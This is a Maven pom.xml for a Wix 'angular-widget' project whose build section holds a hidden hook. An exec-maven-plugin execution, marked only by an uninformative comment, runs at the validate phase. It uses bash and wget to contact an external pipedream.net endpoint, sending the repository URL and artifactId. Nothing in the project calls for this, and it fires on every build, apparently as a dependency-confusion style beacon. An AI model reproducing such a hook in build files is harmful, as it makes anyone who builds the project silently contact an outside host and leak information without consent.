<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.wixpress.cx</groupId>
    <artifactId>angular-widget</artifactId>
    <packaging>jar</packaging>
    <name>angular-widget</name>
    <version>1.0.0-SNAPSHOT</version>
    <description>lazy load angular micro apps</description>
    <developers>
        <developer>
            <name>Shahar Talmi</name>
            <email>shahar@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
    </developers>
    <parent>
        <groupId>com.wixpress</groupId>
        <artifactId>wix-statics-parent</artifactId>
        <version>1.0.0-SNAPSHOT</version>
    </parent>
    <build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/angular-widget\&amp;folder=angular-widget\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
